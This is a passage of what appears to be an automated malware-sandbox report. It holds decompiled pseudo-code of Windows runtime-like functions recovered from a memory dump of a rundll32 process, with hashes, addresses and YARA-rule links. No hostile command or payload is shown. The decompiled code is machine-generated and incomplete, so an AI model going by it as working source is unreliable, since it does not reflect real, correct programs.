                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                • Instruction ID: a2ec3e057986d0623added4113b53945a04a93de340a816fa382673cabf29043
                                                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                                • Instruction Fuzzy Hash: 9F312471B01596AAEF04EBB1C580BEEF754BF42248F48815FC01C57302DB747A0ADBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04446DE6 Relevance: .1, Instructions: 101COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E04446DE6(signed int __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t39;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t59;
				signed int _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t68;
				intOrPtr _t69;
				signed int _t73;
				signed int _t75;
				intOrPtr _t77;
				signed int _t80;
				intOrPtr _t82;

				_t68 = __edx;
				_push(__ecx);
				_t80 = __ecx;
				_t75 = _a4;
				if(__edx >  *((intOrPtr*)(__ecx + 0x90))) {
					L23:
					asm("lock inc dword [esi+0x110]");
					if(( *(_t80 + 0xd4) & 0x00010000) != 0) {
						asm("lock inc dword [ecx+eax+0x4]");
					}
					_t39 = 0;
					L13:
					return _t39;
				}
				_t63 =  *(__ecx + 0x88);
				_t4 = _t68 + 7; // 0xa
				_t69 =  *((intOrPtr*)(__ecx + 0x8c));
				_t59 = _t4 & 0xfffffff8;
				_v8 = _t69;
				if(_t75 >= _t63) {
					_t75 = _t75 % _t63;
					L15:
					_t69 = _v8;
				}
				_t64 =  *((intOrPtr*)(_t80 + 0x17c + _t75 * 4));
				if(_t64 == 0) {
					L14:
					if(E04446EBE(_t80, _t64, _t75) != 1) {
						goto L23;
					}
					goto L15;
				}
				asm("lock inc dword [ecx+0xc]");
				if( *((intOrPtr*)(_t64 + 0x2c)) != 1 ||  *((intOrPtr*)(_t64 + 8)) > _t69) {
					goto L14;
				} else {
					_t73 = _t59;
					asm("lock xadd [eax], edx");
					if(_t73 + _t59 > _v8) {
						if(_t73 <= _v8) {
							 *(_t64 + 4) = _t73;
						}
						goto L14;
					}
					_t77 = _t73 + _t64;
					_v8 = _t77;
					 *_a12 = _t64;
					_t66 = _a8;
					if(_t66 == 0) {
						L12:
						_t39 = _t77;
						goto L13;
					}
					_t52 =  *((intOrPtr*)(_t80 + 0x10));
					if(_t52 != 0) {
						_t53 = _t52 - 1;
						if(_t53 == 0) {
							asm("rdtsc");
							 *_t66 = _t53;
							L11:
							 *(_t66 + 4) = _t73;
							goto L12;
						}
						E04436A60(_t66);
						goto L12;
					}
					while(1) {
						_t73 =  *0x7ffe0018;
						_t82 =  *0x7FFE0014;
						if(_t73 ==  *0x7FFE001C) {
							break;
						}
						asm("pause");
					}
					_t66 = _a8;
					_t77 = _v8;
					 *_t66 = _t82;
					goto L11;
				}
			}


















                                                                                                                0x04446de6
                                                                                                                0x04446dee
                                                                                                                0x04446df1
                                                                                                                0x04446df4
                                                                                                                0x04446dfd
                                                                                                                0x044805d3
                                                                                                                0x044805d3
                                                                                                                0x044805e4
                                                                                                                0x044805f9
                                                                                                                0x044805f9
                                                                                                                0x044805fe
                                                                                                                0x04446e96
                                                                                                                0x04446e9c
                                                                                                                0x04446e9c
                                                                                                                0x04446e03
                                                                                                                0x04446e09
                                                                                                                0x04446e0c
                                                                                                                0x04446e12
                                                                                                                0x04446e15
                                                                                                                0x04446e1b
                                                                                                                0x044805a1
                                                                                                                0x04446eb1
                                                                                                                0x04446eb1
                                                                                                                0x04446eb1
                                                                                                                0x04446e21
                                                                                                                0x04446e2a
                                                                                                                0x04446e9f
                                                                                                                0x04446eab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04446eab
                                                                                                                0x04446e2c
                                                                                                                0x04446e34
                                                                                                                0x00000000
                                                                                                                0x04446e3d
                                                                                                                0x04446e3d
                                                                                                                0x04446e42
                                                                                                                0x04446e4d
                                                                                                                0x044805ac
                                                                                                                0x044805b2
                                                                                                                0x044805b2
                                                                                                                0x00000000
                                                                                                                0x044805ac
                                                                                                                0x04446e56
                                                                                                                0x04446e59
                                                                                                                0x04446e5d
                                                                                                                0x04446e5f
                                                                                                                0x04446e64
                                                                                                                0x04446e94
                                                                                                                0x04446e94
                                                                                                                0x00000000
                                                                                                                0x04446e94
                                                                                                                0x04446e6a
                                                                                                                0x04446e6d
                                                                                                                0x044805ba
                                                                                                                0x044805bd
                                                                                                                0x044805ca
                                                                                                                0x044805cc
                                                                                                                0x04446e91
                                                                                                                0x04446e91
                                                                                                                0x00000000
                                                                                                                0x04446e91
                                                                                                                0x044805c0
                                                                                                                0x00000000
                                                                                                                0x044805c0
                                                                                                                0x04446e7e
                                                                                                                0x04446e7e
                                                                                                                0x04446e80
                                                                                                                0x04446e86
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04446eba
                                                                                                                0x04446eba
                                                                                                                0x04446e88
                                                                                                                0x04446e8b
                                                                                                                0x04446e8f
                                                                                                                0x00000000
                                                                                                                0x04446e8f

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                                                                • Instruction ID: bb082f6ecaa34596cdc5023fc2fcb48d59bdf3a0ce89b15aa0d7de5077c66987
                                                                                                                • Opcode Fuzzy Hash: 8f5923ccfc62e11761a64181f477a9fcd764954153fe337c5a9bd4bea8846838
                                                                                                                • Instruction Fuzzy Hash: 59316E31214205DFEB24CF29C480A6AB3E6FFC6315B26C95EE4598B255DB35F906CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0443A70E Relevance: .1, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E0443A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x44f7b10; // 0x9
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x44f7b10 = 8;
					 *0x44f7b14 = 0x44f7b0c;
					 *0x44f7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0xa
					E0443A990(0x44f7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0443A840(__edx, __ecx, __ecx, _t52, 0x44f7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x44f7b10; // 0x9
					_t3 = _t37 + 0x27; // 0x30
					__eflags = _t3 >> 5 -  *0x44f7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x44f7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x30
						_v8 = _t4 >> 5;
						_t50 = L04424620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x44f7b18 = _v8;
						_t8 = _t52 + 7; // 0x10
						E0444F3E0(_t50,  *0x44f7b14, _t8 >> 3);
						_t28 =  *0x44f7b14; // 0x77e17b0c
						__eflags = _t28 - 0x44f7b0c;
						if(_t28 != 0x44f7b0c) {
							L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x11
						 *0x44f7b14 = _t50;
						_t48 = _v12;
						 *0x44f7b10 = _t9;
						goto L6;
					}
					 *0x44f7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                                                0x0443a713
                                                                                                                0x0443a714
                                                                                                                0x0443a717
                                                                                                                0x0443a71d
                                                                                                                0x0443a720
                                                                                                                0x0443a722
                                                                                                                0x0443a727
                                                                                                                0x0443a74a
                                                                                                                0x0443a754
                                                                                                                0x0443a75e
                                                                                                                0x0443a768
                                                                                                                0x0443a76a
                                                                                                                0x0443a773
                                                                                                                0x0443a78b
                                                                                                                0x0443a790
                                                                                                                0x0443a792
                                                                                                                0x0443a741
                                                                                                                0x0443a741
                                                                                                                0x0443a743
                                                                                                                0x0443a749
                                                                                                                0x0443a749
                                                                                                                0x0443a732
                                                                                                                0x0443a73a
                                                                                                                0x0443a797
                                                                                                                0x0443a79d
                                                                                                                0x0443a7a3
                                                                                                                0x0443a7a9
                                                                                                                0x0443a7b6
                                                                                                                0x0443a7bc
                                                                                                                0x0443a7ca
                                                                                                                0x0443a7e0
                                                                                                                0x0443a7e2
                                                                                                                0x0443a7e4
                                                                                                                0x04479bf2
                                                                                                                0x00000000
                                                                                                                0x04479bf2
                                                                                                                0x0443a7ed
                                                                                                                0x0443a7f2
                                                                                                                0x0443a800
                                                                                                                0x0443a805
                                                                                                                0x0443a80d
                                                                                                                0x0443a812
                                                                                                                0x04479c08
                                                                                                                0x04479c08
                                                                                                                0x0443a818
                                                                                                                0x0443a81b
                                                                                                                0x0443a821
                                                                                                                0x0443a824
                                                                                                                0x00000000
                                                                                                                0x0443a824
                                                                                                                0x0443a7ae
                                                                                                                0x00000000
                                                                                                                0x0443a7ae
                                                                                                                0x0443a73c
                                                                                                                0x0443a73e
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 11f894b8b0c2f5c7e94229f00a07c8d49141db85532c46ee38ccb667c4f4d74c
                                                                                                                • Instruction ID: bc37edeafb11e43e6f5acfc2ddbe5a2db3092fe8ab7c8873a4c1ffa10259653d
                                                                                                                • Opcode Fuzzy Hash: 11f894b8b0c2f5c7e94229f00a07c8d49141db85532c46ee38ccb667c4f4d74c
                                                                                                                • Instruction Fuzzy Hash: B831AEB16202009BEB11CF18D880F6677F9FB8AB58F14095BE145A7244D7BCBD21CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044361A0 Relevance: .1, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E044361A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04435E50(0x43e67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E044D9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E0440F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                                                0x044361b3
                                                                                                                0x044361b5
                                                                                                                0x044361bd
                                                                                                                0x044361c3
                                                                                                                0x044361c7
                                                                                                                0x044361d2
                                                                                                                0x044361ff
                                                                                                                0x044361ff
                                                                                                                0x04436201
                                                                                                                0x04436207
                                                                                                                0x04436207
                                                                                                                0x044361d4
                                                                                                                0x044361d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044361df
                                                                                                                0x044361e2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x044361e6
                                                                                                                0x044361e8
                                                                                                                0x044361ee
                                                                                                                0x044361ee
                                                                                                                0x044361f9
                                                                                                                0x0447762f
                                                                                                                0x04477632
                                                                                                                0x04477635
                                                                                                                0x04477639
                                                                                                                0x04477640
                                                                                                                0x0447766e
                                                                                                                0x04477675
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04477681
                                                                                                                0x04477689
                                                                                                                0x0447768d
                                                                                                                0x04477691
                                                                                                                0x04477695
                                                                                                                0x04477699
                                                                                                                0x044776af
                                                                                                                0x044776b5
                                                                                                                0x044776b7
                                                                                                                0x044776b7
                                                                                                                0x044776d7
                                                                                                                0x044776dc
                                                                                                                0x00000000
                                                                                                                0x044776dc
                                                                                                                0x044776a2
                                                                                                                0x044776a9
                                                                                                                0x04477651
                                                                                                                0x04477653
                                                                                                                0x04477653
                                                                                                                0x04477656
                                                                                                                0x04477656
                                                                                                                0x00000000
                                                                                                                0x04477656
                                                                                                                0x04477644
                                                                                                                0x04477646
                                                                                                                0x04477648
                                                                                                                0x04477648
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e43aa790d697189a889f18117a3e5900a60eceb87af16504e428a8d2dca7c740
                                                                                                                • Instruction ID: 9a75a0467e287fc405f6eddeb257d3b0c9476255781eda6fbe3e8de75ba9ac2a
                                                                                                                • Opcode Fuzzy Hash: e43aa790d697189a889f18117a3e5900a60eceb87af16504e428a8d2dca7c740
                                                                                                                • Instruction Fuzzy Hash: 023189716053019FDB20DF09C840B67B7E4FB88B14F46496EE9989B351E7B0F805CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0440AA16 Relevance: .1, Instructions: 93COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E0440AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x44fd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x44f7b9c; // 0x0
					_t53 = L04424620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0444B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0444F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L04416C59(_t53, _t51, _t58) != 0) {
							_t28 = E04435E50(0x43ec338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0443B230(_v32, _v28, 0x43ec2d8, 1,  &_v24);
								_t28 = E0440F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                                0x0440aa25
                                                                                                                0x0440aa29
                                                                                                                0x0440aa2d
                                                                                                                0x0440aa30
                                                                                                                0x0440aa37
                                                                                                                0x0440aa3c
                                                                                                                0x04464458
                                                                                                                0x04464458
                                                                                                                0x04464472
                                                                                                                0x04464474
                                                                                                                0x04464476
                                                                                                                0x0440aa64
                                                                                                                0x0440aa74
                                                                                                                0x0446447c
                                                                                                                0x04464483
                                                                                                                0x04464492
                                                                                                                0x0440aa52
                                                                                                                0x0440aa54
                                                                                                                0x0440aa5e
                                                                                                                0x044644a8
                                                                                                                0x044644ad
                                                                                                                0x044644af
                                                                                                                0x044644b6
                                                                                                                0x044644b6
                                                                                                                0x044644b9
                                                                                                                0x044644bc
                                                                                                                0x044644cd
                                                                                                                0x044644d3
                                                                                                                0x044644d6
                                                                                                                0x044644e1
                                                                                                                0x044644e1
                                                                                                                0x044644e6
                                                                                                                0x044644e8
                                                                                                                0x044644fb
                                                                                                                0x044644fb
                                                                                                                0x044644e8
                                                                                                                0x00000000
                                                                                                                0x0440aa5e
                                                                                                                0x04464476
                                                                                                                0x0440aa42
                                                                                                                0x0440aa46
                                                                                                                0x0440aa48
                                                                                                                0x0440aa4c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cfac41ccabe482a48f531285ffe1ca05725c0a20e21a8c552ad4ce7162d02076
                                                                                                                • Instruction ID: f841b930273246a9d69847458aa2d50423bd36644fd6e5c528546879d408d3d5
                                                                                                                • Opcode Fuzzy Hash: cfac41ccabe482a48f531285ffe1ca05725c0a20e21a8c552ad4ce7162d02076
                                                                                                                • Instruction Fuzzy Hash: AC31B171A00229ABDF109F65CD42A7FB7B8EF48704B05406AF901E7281E778B921DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04448EC7 Relevance: .1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E04448EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x44fd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04434E70(0x44f86e4, 0x4449490, 0, 0);
					if( *0x44f53e8 > 5 && E04448F33(0x44f53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x44f53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x44f53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x43ebc46;
						_t48 = E04487B9C(0x44f53e8, 0x43ebc46, _t67, 0x44f53e8, _t70,  &_v140);
					}
				}
				return E0444B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                                                0x04448ec7
                                                                                                                0x04448ed9
                                                                                                                0x04448edc
                                                                                                                0x04448ee6
                                                                                                                0x04448ee9
                                                                                                                0x04448eee
                                                                                                                0x04448efc
                                                                                                                0x04448f08
                                                                                                                0x04481349
                                                                                                                0x04481353
                                                                                                                0x0448135d
                                                                                                                0x04481366
                                                                                                                0x0448136f
                                                                                                                0x04481375
                                                                                                                0x0448137c
                                                                                                                0x04481385
                                                                                                                0x04481390
                                                                                                                0x04481391
                                                                                                                0x0448139c
                                                                                                                0x0448139d
                                                                                                                0x044813a6
                                                                                                                0x044813ac
                                                                                                                0x044813b2
                                                                                                                0x044813b5
                                                                                                                0x044813bc
                                                                                                                0x044813bf
                                                                                                                0x044813c2
                                                                                                                0x044813c5
                                                                                                                0x044813c8
                                                                                                                0x044813cb
                                                                                                                0x044813ce
                                                                                                                0x044813d1
                                                                                                                0x044813d4
                                                                                                                0x044813d7
                                                                                                                0x044813da
                                                                                                                0x044813dd
                                                                                                                0x044813e0
                                                                                                                0x044813e3
                                                                                                                0x044813e6
                                                                                                                0x044813e9
                                                                                                                0x044813f6
                                                                                                                0x04481400
                                                                                                                0x04481400
                                                                                                                0x04448f08
                                                                                                                0x04448f32

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a100b7304f2166ecdfaf6c32918726619ed33bfa8783976f6e3c3e16bd36c31c
                                                                                                                • Instruction ID: 781d568ea878b7af332e01fb1400b4c75d234f903f9c664e52e93f7d65537ebf
                                                                                                                • Opcode Fuzzy Hash: a100b7304f2166ecdfaf6c32918726619ed33bfa8783976f6e3c3e16bd36c31c
                                                                                                                • Instruction Fuzzy Hash: F941A4B5D002189FEB10DFAAD981AADFBF4FB48714F50416FE509A7241DB746A44CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04444A2C Relevance: .1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E04444A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x44fd360 ^ _t62;
				_v8 =  *0x44fd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E04422280(_t26, 0x44f8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E0441FFB0(_t41, _t51, 0x44f8608);
						L2:
						 *0x44fb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0444B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E04422280(_t28, 0x44f8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E0441FFB0(_t42, _t53, 0x44f8608);
							if(_t53 != 0) {
								L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E0441FFB0(_t41, _t51, 0x44f8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                                                0x04444a2c
                                                                                                                0x04444a34
                                                                                                                0x04444a3c
                                                                                                                0x04444a3e
